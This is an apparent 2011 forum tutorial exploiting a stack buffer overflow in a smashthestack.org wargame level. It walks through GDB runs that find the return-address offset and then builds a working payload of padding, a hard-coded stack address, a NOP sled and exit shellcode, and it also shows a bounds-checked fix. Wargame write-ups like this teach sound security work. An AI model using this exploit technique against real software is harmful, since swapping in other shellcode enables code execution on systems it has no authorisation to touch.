Go4Expert (http://www.go4expert.com/) > Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/) > Stack Overflow Code Execution Basics (http://www.go4expert.com/articles/stack-overflow-code-execution-basics-t24937/)

lionaneesh 10Feb2011 22:36

Stack Overflow Code Execution Basics
 
This is a continuation of my previous article on stack overflows, Basics of EIP Overwrite. I suggest glancing over it before reading further.

Again in this article we'll be using a vulnerable program to demonstrate the attack.
Our main aim is to redirect the vulnerable program's control flow and make it do what we want it to do.

In this article I'm taking the exploitation a step further: we'll be exploiting a simple wargame level.

And I'll be exploiting this code on their machine only.

Exploiting


Code: c

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[128];

    if(argc < 2) return 1;

    /* No bounds check: an argument longer than 127 bytes overflows buf */
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}
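As an added example (not the article's or the wargame's code), here is the same program with the copy bounded, so that an over-long argument is rejected instead of running past the 128-byte buffer; copy_arg() and hardened_main() are names chosen for this example.

```c
/* Added example, not the article's or the wargame's code: the level05 program
 * above copies argv[1] into a 128-byte stack buffer with strcpy() and never
 * checks its length, so a long enough argument runs past the buffer into the
 * saved frame pointer and return address. This hardened version bounds the
 * copy; copy_arg() and hardened_main() are names chosen for this example. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128    /* same buffer size as the vulnerable program */

/* Copy src into dst (dstsz bytes) only if it fits with its NUL terminator.
 * Returns 0 on success and -1 when strcpy() would have overflowed dst. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (dstsz == 0 || len >= dstsz)   /* 128+ bytes cannot fit with the NUL */
        return -1;
    memcpy(dst, src, len + 1);        /* length checked above, NUL included */
    return 0;
}

/* The original main() with the unbounded strcpy() replaced by copy_arg().
 * Exit codes: 0 printed, 1 missing argument, 2 argument rejected as too long. */
int hardened_main(int argc, char **argv)
{
    char buf[BUF_SIZE];

    if (argc < 2)
        return 1;
    if (copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("%s\n", buf);
    return 0;
}

int main(int argc, char **argv)
{
    return hardened_main(argc, argv);
}
```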

I'll be using a basic exit shellcode for demonstration purposes, but any shellcode of a suitable size can be used against this program.

So let's put on our grey thinking hats and get started.

To exploit this program we have to overwrite the EIP register, which we already learnt how to do in the previous tutorial, so I'll not be repeating that here.

Now what we want is to overwrite EIP and make it point to our shellcode, which gives us control of the program's execution.

So let's first ssh to their machine:

Code:

aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224
level5@io.smashthestack.org's password:
 ______  _____
/\__  _\ /\  __`\
\/_/\ \/ \ \ \/\ \      Levels are in /levels
  \ \ \  \ \ \ \ \    Passes are in ~/.pass
    \_\ \__\ \ \_\ \
    /\_____\\ \_____\  Server admin: beach (beach@smashthestack.org)
    \/_____/ \/_____/  Server janitor: bla

        1. No DoS, local or otherwise
        2. Do not try to connect to remote systems from this box
        3. Only two connections per IP are allowed
        4. Quotas are in place so don't waste resources
        5. This rules list is not all inclusive and is subject to change
        6. Have fuN++

                                (28 levels)

- use long(>5char) names in /tmp, short stuff is periodically deleted, as are
easily guessable ones
- o and feel free to leave your email in /home/email.list (it's writeonly)

-  Thanks everybody for the new translations!

level5@io:~$
level5@io:~$ cd /levels/
level5@io:/levels$ ls
beta           level06_alt       level10       level16        level23.c
level01        level06_alt.c     level10.c     level16.c      level24
level02        level06_alt.pass  level11       level16.pass   level24.c
level02_alt    level06.c         level11.c     level17        level25
level02_alt.c  level07           level12       level17.c      level25.c
level03        level07_alt       level12.c     level18        level26
level03.c      level07_alt.c     level12.pass  level18.c      level26.l
level04        level07.c         level13       level18_cross  level26.y
level04.c      level08           level13.c     level19        level27
level05        level08_alt       level14       level19.c      level27.c
level05_alt    level08_alt.cpp   level14.c     level20        level27.pass
level05_alt.c  level08.c         level15       level21        level28
level05.c      level09           level15.c     level22        level28.c
level06        level09.c         level15.pass  level23
level5@io:/levels$ cat level0
level01          level04.c        level06_alt.c     level08
level02          level05          level06_alt.pass  level08_alt
level02_alt      level05_alt      level06.c         level08_alt.cpp
level02_alt.c    level05_alt.c    level07           level08.c
level03          level05.c        level07_alt       level09
level03.c        level06          level07_alt.c     level09.c
level04          level06_alt      level07.c
level5@io:/levels$ cat level05
level05        level05_alt    level05_alt.c  level05.c
level5@io:/levels$

Note: I'll not be revealing the password for this level as it's not allowed.

Let's now run it in GDB and exploit it:

Code:

level5@io:/levels$ gdb ./level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Now let's place a breakpoint at the beginning of the program (main) and run it:

Code:

(gdb) break main
Breakpoint 1 at 0x80483bd

Let's run it with an argument of 160 A's.
We'll be using a basic Python one-liner to generate our attack string (the program's input).
Code:

(gdb) run `python -c 'print"\x41"*160'`
Starting program: /levels/level05 `python -c 'print"\x41"*160'`
Breakpoint 1, 0x080483bd in main ()

Now just step through the program and see what happens:

Code:

(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0x41414141 in ?? ()
(gdb)

OK, it's pretty obvious that we have overwritten EIP with 0x41414141 (GDB complains that it cannot access memory at that address: 0x41414141 is an arbitrary address that isn't mapped in the program's address space, so execution cannot continue there).

Now let's try a few different inputs to get a basic picture of what's happening:

Code:

(gdb) run `python -c 'print"\x41"*140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Cannot access memory at address 0x41414145
(gdb)

So, do you see the pattern now?

It basically means that, to overwrite EIP with our desired address, we arrive at the following attack string (the 140 bytes cover the 128-byte buffer plus the saved frame pointer and compiler padding that sit between it and the return address):

Code:

[Garbage string]    [EIP]
       |              |
 Should be 140    The desired
 chars long       address overwrite

Let's test it:

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
0x42424242 in ?? ()

Boom! We have total control over the EIP overwrite.
Now we need to inject our shellcode and point EIP at it.

Let's first look at where our data goes:

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC
0x42424242 in ?? ()
(gdb) x/10bx $esp
0xbfffdc80:     0x43    0x43    0x43    0x43    0x43    0x43    0x43    0x43
0xbfffdc88:     0x43    0x43
(gdb)

OK, so from the above we arrive at the following attack string:

Code:

[Garbage string]    [EIP]                 [ESP]
       |              |                     |
 Should be 140    The desired          The desired data
 chars long       address overwrite    to place on the stack

So we have a large amount of data space at ESP. We can simply place our shellcode there and overwrite EIP with its address.

Let's do it!

We'll again be using the same exit shellcode we made in our previous article:

Code:

(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`

Breakpoint 1, 0x080483bd in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀
0xbfffdc80 in ?? ()
(gdb) continue
Continuing.

Program exited with code 07.
(gdb)

Whoa! We did it. Now the explanation.

Attack string
Code:

"\x41"*140 + "\x80\xdc\xff\xbf" + "\x90"*10 + "\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
    |                |                 |                    |
 Garbage         Hard-coded         NOP sled       The exit shellcode
 string          address of ESP
                 (little endian)

The NOP sled is simply a run of \x90 (nop) instructions; this instruction does nothing.
We use it to make our attack string more robust, because the stack address shifts slightly between executions of the program. Without the NOP sled, a small shift would make our attack string fail.

That's all for this article. Stay tuned for more.

lionaneesh 12Feb2011 11:01

Re: Stack Overflow Code Execution Basics
 
Thanks for accepting.
Hope people can get a better understanding of stack overflows.

